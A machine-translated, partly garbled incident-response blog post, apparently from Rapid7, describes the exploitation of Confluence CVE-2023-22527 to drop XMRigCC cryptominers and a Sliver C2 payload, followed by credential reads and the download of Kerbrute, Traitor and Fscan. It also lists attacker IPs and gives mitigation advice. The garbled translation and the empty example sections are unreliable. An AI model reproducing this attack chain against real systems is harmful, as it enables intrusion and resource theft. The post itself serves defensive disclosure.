RCE到silver:来自战场的IR故事

最后更新于2024年2月27日星期二17:16:10 GMT

*快速7事件响应顾问Noah Hemker, 泰勒斯塔克斯, 恶意软件分析师汤姆·埃尔金斯为本博客提供了分析和见解.*

Rapid7 事件响应 was engaged to investigate an incident involving unauthorized access to two publicly-facing Confluence servers that were the source of multiple malware executions. Rapid7发现了利用的证据 cve - 2023 - 22527 在可用的汇合日志中. 在调查过程中, Rapid7 identified cryptomining software and a Sliver 指挥与控制 (C2) payload on in-scope servers. Sliver is a modular C2 framework that provides adversarial emulation capabilities for red teams; however, 它也经常被威胁行为者滥用. The Sliver payload was used to action subsequent threat actor objectives within the environment. Without proper security tooling to monitor system network traffic and firewall communications, 这种活动会在不被发现的情况下进行，导致进一步的妥协.

Rapid7客户

Rapid7始终监控 紧急的威胁 确定有新的检测机会的领域. The recent appearance of Sliver C2 malware prompted Rapid7 teams to conduct a thorough analysis of the techniques being utilized and the potential risks. Rapid7 insighttidr有一个警报规则 Suspicious Web Request - Possible Atlassian Confluence cve - 2023 - 22527 Exploitation 的使用情况，所有IDR客户都可以使用 text-inline.vm 与cve - 2023 - 22527漏洞一致. A 漏洞检查 也适用于InsightVM和expose客户. A Velociraptor artifact to hunt for evidence of Confluence cve - 2023 - 22527 exploitation is available on the Velociraptor Artifact Exchange here. 阅读Rapid7的博客 cve - 2023 - 22527.

观察到的攻击者行为

Rapid7 IR began the investigation by triaging available forensic artifacts on the two affected publicly-facing Confluence servers. These servers were both running vulnerable Confluence software versions that were abused to obtain Remote Code Execution (RCE) capabilities. Rapid7审查了服务器访问日志，以识别可疑的存在 POST 请求与已知漏洞一致，包括 cve - 2023 - 22527. 此漏洞是一个严重的OGNL注入漏洞，它滥用了 text-inline.vm 通过向服务器发送修改后的POST请求来修改Confluence的组件.

证据显示有多个实例利用了该CVE, however, evidence of an embedded command would not be available within the standard header information logged within access logs. Packet Capture (PCAP) was not available to be reviewed to identify embedded commands, 但是已经确定的 POST 请求与CVE的利用一致.
The following are a few examples of the exploitation of the Confluence CVE found within access logs:

证据显示执行死刑 curl command post-exploitation of the CVE resulting in the dropping of cryptomining malware to the system. The IP addresses associated with the malicious POST requests to the Confluence servers matched the IP addresses of the identified curl command. This indicates that the dropped cryptomining malware was directly tied to Confluence CVE exploitation.
作为执行的结果 curl 命令、文件 w.sh 是写给 /tmp/ 系统上的目录. 该文件是一个bash脚本，用于枚举操作系统, 下载密码挖掘安装文件, 然后执行加密挖矿二进制文件. 然后bash脚本执行 wget 命令下载 javs.tar.gz 从IP地址 38.6.173[.]11 over port 80. 该文件被识别为 XMRigCC cryptomining malware which caused a spike in system resource utilization consistent with cryptomining activity. Service javasgs_miner.service 是否在系统上创建并设置为以root身份运行以确保持久化.

中包含的代码片段 w.sh defining communication parameters for the downloading and execution of the XMRigCC binary.

Rapid7在里面发现了额外的日志证据 Catalina.log that references the download of the above file inside of an HTTP response header. This response registered as ‘invalid’ as it contained characters that could not be accurately interpreted. 证据证实了XMRigCC矿机的成功下载和执行, so the above Catalina log may prove useful for analysts to identify additional proof of attempted or successful exploitation.

Rapid7 then shifted focus to begin a review of system network connections on both servers. 证据显示有一个已知被滥用IP地址的活跃连接 193.29.13[.]179 通过端口通信 8888 从两个服务器. netstat 命令输出显示网络连接的源程序被调用 X-org 并且位于系统的 /tmp directory. 根据防火墙日志, the first identified communication from this server to the malicious IP address aligned with the timestamps of the identified X-org 文件创建. Rapid7 identified another malicious file residing on the secondary server named X0 Both files shared the same SHA256 hash, indicating that they are the same binary. 这些文件的散列已在下面的ioc部分中提供.

A review of firewall logs provided a comprehensive view of the communications between affected systems and the malicious IP address. Firewall logs filtered on traffic between the compromised servers and the malicious IP address showed inbound and outbound data transfers consistent with known C2 behavior. Rapid7 decoded and debugged the Sliver payload to extract any available 妥协指标 (IOCs). 在silver有效载荷中，Rapid7确认了以下IP地址 193.29.13[.]179 会通过港口进行通信 8888 using the mTLS 认证协议.

在silver第一次与C2沟通之后, it checked the username associated with the current session on the local system, read etc/passwd and 等/ machine-id 然后再次与C2沟通. 的内容 passwd and machine-id 提供系统信息，如主机名和系统上的任何帐户. Cached credentials from the system were discovered to be associated with outbound C2 traffic further supporting this credential access. This activity is consistent with the standard capabilities available within the GitHub release of Sliver hosted here.

稍后将使用silver C2连接执行 wget 用于下载的命令 Kerbrute, Traitor, and Fscan 到服务器. Kerbute 是从 dev/shm and is commonly used to brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentications. The Traitor 二进制文件从 var/tmp 目录，其中包含要利用的功能 Pwnkit and Dirty Pipe 从系统的证据中可以看出. Fscan 是从 var/tmp 带有文件名的目录 f 并执行扫描以枚举环境中存在的系统. Rapid7执行了遏制措施，以阻止任何进一步的威胁行为者活动. No additional post-exploitation objectives were identified within the environment.

缓解指导

以减轻本博客中概述的攻击者行为, 应考虑以下缓解技术:

• Ensure that unnecessary ports and services are disabled on publicly-facing servers.

• All publicly-facing servers should regularly be patched and remain up-to-date with the most recent software releases.

• Environment firewall logs should be aggregated into a centralized security solution to allow for the detection of abnormal network communications.

• Firewall rules should be implemented to deny inbound and outbound traffic from unapproved geolocations.

• Publicly-facing servers hosting web applications should implement a restricted shell, 在可能的情况下, to limit the capabilities and scope of commands available when compared to a standard bash shell.

MITRE ATT&CK技术

妥协指标